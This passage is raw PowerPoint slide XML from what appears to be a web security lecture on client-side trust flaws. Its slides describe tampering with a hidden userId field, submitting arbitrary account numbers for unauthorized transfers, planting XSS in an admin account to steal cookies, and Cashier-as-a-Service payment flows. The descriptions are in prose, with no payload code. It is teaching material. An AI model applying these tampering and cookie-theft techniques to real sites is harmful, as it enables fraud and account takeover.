        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2838579" y="2289519"/>
            <a:ext cx="1312862" cy="898525"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">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buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Left Brace 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8BEA54B-5FE1-884A-BA46-39F37ABFE2BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4940430" y="2699093"/>
            <a:ext cx="484187" cy="622300"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8330"/>
              <a:gd name="adj2" fmla="val 42727"/>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pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Straight Arrow Connector 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96D358B6-1B5C-B943-9E30-A6B1B878AADA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4221292" y="2911818"/>
            <a:ext cx="828675" cy="69850"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="63500" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="sysDash"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98C57295-F5C9-9947-B121-0A7B806AADAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="973267" y="4616193"/>
            <a:ext cx="6275173" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln w="9525">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Vulnerability: malicious client submits arbitrary account </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>	        numbers for unauthorized money transfers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{773F303C-2B0A-FB49-B8F7-A295CE28DFB6}"/>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867599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3" descr="cm.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF0A3C9D-B1DC-3E44-AFB4-6C5CA5D36D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9811" y="1880084"/>
            <a:ext cx="2903537"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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3ED15CE-3830-CD46-BAFB-0762A87BBAD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>IT Support</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73D59F1B-E4E3-7A47-AF9A-2539D899749A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1189811" y="4722536"/>
            <a:ext cx="4384589" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="squar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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Vulnerability: update arbitrary account</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFF9F523-381A-E547-97F5-908ABA77F10A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4822011" y="1978254"/>
            <a:ext cx="4713287" cy="1930415"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="82945" tIns="41473" rIns="82945" bIns="41473">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Client-side constraints: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D0D0D"/>
              </a:solidFill>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>userId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> == 96	(hidden field)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D0D0D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Server-side code: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>     Update profile with id 96</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0D0D"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>     with new details</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA01D1D3-288E-7440-BFAD-12AA94508FB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1127899" y="5330548"/>
            <a:ext cx="65277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en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Inject a cross-site scripting (XSS) payload in admin account,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>cookies stolen every time admin logged in</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Oval 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8264E48-7193-514E-A38E-A182AF1E567A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="848497" y="2557946"/>
            <a:ext cx="1392238" cy="968375"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">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buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Hidden </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="73000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Field</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="73000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Left Brace 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D60DB824-95BD-164E-A3E4-616DADE85628}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4591822" y="2351570"/>
            <a:ext cx="609600" cy="344488"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="635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73000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Arrow Connector 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD2FB1DA-1E8B-5641-82F1-C2ED7D4018FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="15" idx="6"/>
            <a:endCxn id="16" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2240736" y="2524609"/>
            <a:ext cx="2351087" cy="517525"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="63500" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="sysDash"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2E414FA-2520-1C4F-9680-F5AF714866A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9417849" y="473317"/>
            <a:ext cx="2170787" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>Bisht et al. “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>NoTamper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3326373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27" grpId="0"/>
      <p:bldP spid="15"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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D868794-26E7-6E49-8C0B-6D7627326CD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Cashier-as-a-Service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="AutoShape 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A18EA491-4393-D642-81E6-AAEAAAFA49FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2888694" y="1698747"/>
            <a:ext cx="3767137" cy="4094163"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="116742" name="Picture 71">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05BCB4EA-5E91-E54A-B22C-B64E16D3A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494" y="4643560"/>
            <a:ext cx="8413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0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC2DCEEE-AED0-C742-8F37-BBBF2F8F94E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4884180" y="5758965"/>
            <a:ext cx="3430588" cy="649287"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>PayPal, Amazon Payments, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Google Pay, etc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="116744" name="Picture 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF6F8C54-261A-5840-90A5-5B38954E5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994" y="2138484"/>
            <a:ext cx="10128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0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7121A08C-63AB-6445-BDFD-931639E6345D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5835093" y="1830510"/>
            <a:ext cx="1528762" cy="439737"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Web store</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="116746" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CEE4C37-AB66-874B-8708-BBA178E7A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069" y="3457697"/>
            <a:ext cx="119697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70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BA868D7-FBF8-F046-8C4C-26F7A640A678}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="867806" y="3092571"/>
            <a:ext cx="1719263" cy="649288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Shopper</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Straight Arrow Connector 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{432DCBD6-EDE4-0443-923C-DC28B58A493B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2444193" y="2883022"/>
            <a:ext cx="3670300" cy="94456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2F873F-CFBB-B049-B659-25A52F299371}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2652155" y="4186359"/>
            <a:ext cx="3525838" cy="685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7FE7C0-EDD8-4A44-B195-EF019E067351}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="6058137" y="3936328"/>
            <a:ext cx="1198562" cy="2222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 Box 70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A2B255D-437F-F948-BD32-3BFEEA136D0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="20719375">
            <a:off x="2493405" y="3041771"/>
            <a:ext cx="3511550" cy="439738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>communication about the order</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
